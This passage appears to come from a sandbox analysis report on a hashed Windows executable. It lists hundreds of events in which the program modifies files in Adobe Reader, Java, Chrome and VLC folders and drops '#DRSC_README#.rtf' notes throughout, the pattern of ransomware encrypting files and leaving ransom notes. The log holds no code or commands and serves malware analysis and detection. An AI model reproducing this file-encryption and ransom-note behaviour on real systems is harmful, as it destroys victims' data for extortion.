DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\sv-se\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-openide-util-enumerations.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\zh-tw\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\hu-hu\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\epl-v10.html 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\he-il\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\zh-tw\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\S_IlluCCFilesEmpty_180x180.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\META-INF\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\pl-pl\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\fr-ma\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\p2\org.eclipse.equinox.p2.core\cache\binary\com.oracle.jmc.executable.win32.win32.x86_64_5.5.0 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-core-output2_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-spi-quicksearch_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\move.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\selector.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\rna-main.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\pl-pl\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.security.ui_1.1.200.v20130626-2037.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\email\dummy\adobe-old-logo.jpg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.core.runtime_3.10.0.v20140318-2214.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\css\main-high-contrast.css 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\es-es\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\en-gb\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\images\avatar.jpg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\open_original_form.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Appstore\Download_on_the_App_Store_Badge_da_135x40.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\s_close2x.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\it-it\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\pl-pl\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-options-api_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\themes\dark\bg_pattern_RHP.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\eu-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\images\caution.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\resources.pak 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\zh-tw\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\de-de\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\net.properties 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jre1.8.0_66\lib\images\cursors\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\jsse.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Appstore\Download_on_the_App_Store_Badge_fi_135x40.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\ko-kr\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\include\win32\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\themes\dark\text_2x.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\pt-br\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\pt-br\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\it-it\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\AddressBook2x.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.core.nl_zh_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-keyring-fallback_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\delete.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\css\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\nls\fi-fi\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Appstore\Download_on_the_App_Store_Badge_nb_135x40.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\ext\cldrdata.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\nl-nl\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\nl-nl\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-modules-templates.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\deploy\messages_zh_TW.properties 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\bg_pattern_RHP.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\it-it\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\line.cur 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\ff\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\plugins\rhp\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\cs-cz\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\en-il\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\feature.properties 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\sd\jamendo.luac 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\es-es\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\fi-fi\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\file_icons.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themeless\accessibility_poster.jpg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\v8_context_snapshot.bin 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\en-il\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_folder-hover_32.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench3.nl_zh_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-modules-editor-mimelookup.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\en-il\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\zh-tw\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\uk-ua\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\include\win32\bridge\AccessBridgeCalls.c 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\images\vlc-48.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Windows Mail\wab.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\no_get.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\be_get.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\ar-ae\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\bin\jmap.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-profiler_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\pmd.cer 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\nl_get.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\fr-ma\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\sv-se\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\he-il\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\org-netbeans-lib-profiler-ui.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\uk-ua\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\de-de\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\es-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\images\cursors\win32_MoveDrop32x32.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\root\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\error-icon.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\nl-nl\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\pt-br\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\tr.pak 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\themes\dark\s_filetype_psd.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\fr-fr\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\ro-ro\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\en-ae\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\en-gb\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\bin\jar.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4-dark_win.css 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-openide-dialogs_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\ar\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\sr\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_anonymoususer_18.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\arrow-right-pressed.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\images\themeless\mobile_fillsign_logo.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\license.html 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\zh-tw\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\sk-sk\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\sl-si\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\VisualElements\SmallLogoDev.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\images\themes\dark\new_icons_retina.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_folder-down_32.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\adobe_sign_tag.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\ko-kr\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\pdf-ownership-rdr-es_es_2x.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created 